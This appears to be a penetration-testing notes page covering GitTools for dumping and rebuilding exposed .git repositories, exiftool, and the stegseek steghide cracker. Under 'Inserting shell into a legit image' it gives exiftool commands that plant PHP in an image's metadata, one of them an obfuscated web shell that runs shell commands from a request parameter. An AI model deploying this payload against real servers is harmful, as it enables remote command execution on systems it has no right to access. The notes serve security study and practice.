Skip to content

Miscellaneous Tools

GitTools

Clone the GitTools repository into your current directory using:
git clone https://github.com/internetwache/GitTools

The GitTools repository contains three tools:

  • Dumper can be used to download an exposed .git directory from a website should the owner of the site have forgotten to delete it
  • Extractor can be used to take a local .git directory and recreate the repository in a readable format. This is designed to work in conjunction with the Dumper, but will also work on the repo that we stole from the Git server. Unfortunately for us, whilst Extractor will give us each commit in a readable format, it will not sort the commits by date
  • Finder can be used to search the internet for sites with exposed .git directories. This is significantly less useful to an ethical hacker, although may have applications in bug bounty programs.

The syntax for Extractor is as follows:
./extractor.sh REPO_DIR DESTINATION_DIR

This is slightly confusing, so explaining each option:

  • The REPO_DIR is the directory containing the .git directory for the repository. Note that this is not the .git directory itself. Extractor looks for a .git directory inside the specified directory (which is why we had to change the original name of the directory to ".git")
  • The DESTINATION_DIR is the subdirectory into which the repository will be created

Exiftool

Inserting shell into a legit image

exiftool -Comment="<?php echo \"<pre>Test Payload</pre>\"; die(); ?>" test-sarper.jpeg.php
exiftool -Comment="<?php \$h0=\$_GET[base64_decode('d3JlYXRo')];if(isset(\$h0)){echo base64_decode('PHByZT4=').shell_exec(\$h0).base64_decode('PC9wcmU+');}die();?>" test-sarper.jpeg.php

⚡ Stegseek

Stegseek is a lightning fast steghide cracker that can be used to extract hidden data from files. It is built as a fork of the original steghide project and, as a result, it is thousands of times faster than other crackers and can run through the entirety of rockyou.txt in under 2 seconds.

Stegseek can also be used to extract steghide metadata without a password, which can be used to test whether a file contains steghide data.

stegseek [stegofile.jpg] [wordlist.txt]